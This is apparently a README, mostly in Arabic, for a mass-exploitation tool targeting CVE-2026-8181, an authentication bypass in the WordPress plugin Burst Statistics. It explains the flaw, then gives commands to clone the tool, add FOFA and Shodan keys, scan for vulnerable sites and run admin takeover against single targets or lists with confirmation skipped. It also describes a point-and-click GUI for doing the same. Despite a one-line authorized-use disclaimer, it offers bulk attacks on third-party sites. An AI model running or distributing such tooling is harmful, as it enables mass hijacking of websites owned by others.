
CVE-2026-8181 — تجاوز المصادقة في إضافة Burst Statistics الخاصة بـ WordPress (CVSS 9.8) للاستيلاء على حساب المسؤول. ماسح جماعي مع تكامل FOFA/Shodan وواجهة رسومية حديثة.
CVSS 9.8 (حرج) — تجاوز مصادقة يؤدي إلى الاستيلاء على حساب المسؤول
CVE-2026-8181 هي ثغرة تجاوز مصادقة في إضافة ووردبريس Burst Statistics الإصدارات 3.4.0 إلى 3.4.1.1. تُستخدم هذه الإضافة من قبل أكثر من 200,000 موقع ووردبريس كبديل للتحليلات صديق للخصوصية لجوجل أناليتكس.
تسمح هذه الثغرة لمهاجم غير موثّق يعرف اسم مستخدم المسؤول بـ:
الدالة is_mainwp_authenticated() في class-mainwp-proxy.php تخطئ في التحقق من القيمة المُرجَعة من wp_authenticate_application_password(). تُرجع هذه الدالة null (وليس WP_Error) عند استدعائها خارج سياق REST API، والكود يتحقق فقط من is_wp_error(). وبما أن null ليس WP_Error، يُعتبر المصادقة ناجحة.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
انقر نقرًا مزدوجًا على run.bat أو قم بتشغيل:
py -3.11 gui_modern.py

واجهة المستخدم الرسومية الحديثة لـ CVE-2026-8181 مع 3 علامات تبويب
في علامة تبويب Scan: اختر مصدر الهدف (FOFA/Shodan من .env، ملف، أو يدوي) → انقر SCAN TARGETS في علامة تبويب Exploit: أدخل اسم مستخدم المسؤول → انقر EXPLOIT

تجد الأداة أهدافًا ضعيفة وجاهزة للاستغلال
في حالة نجاح الاستغلال، يحصل المهاجم على وصول كامل كمسؤول:

لوحة تحكم مسؤول ووردبريس بعد الاستغلال الناجح
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env.envلأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام دون إذن على أنظمة ليست مملوكة لك غير قانوني. استخدم فقط على المواقع التي تملكها أو لديك إذن كتابي لها.
| Flag | الوصف |
|---|
-t, --target | عنوان الهدف (مفرد) |
-l, --list | ملف يحتوي على قائمة الأهداف |
-u, --username | اسم مستخدم المسؤول (افتراضي: admin) |
-T, --threads | عدد الخيوط (افتراضي: 10) |
-o, --output | ملف الإخراج للنتائج |
-v, --verbose | إخراج التصحيح |
--timeout | مهلة الطلب (بالثواني) |
--no-confirm | تخطي التأكيد |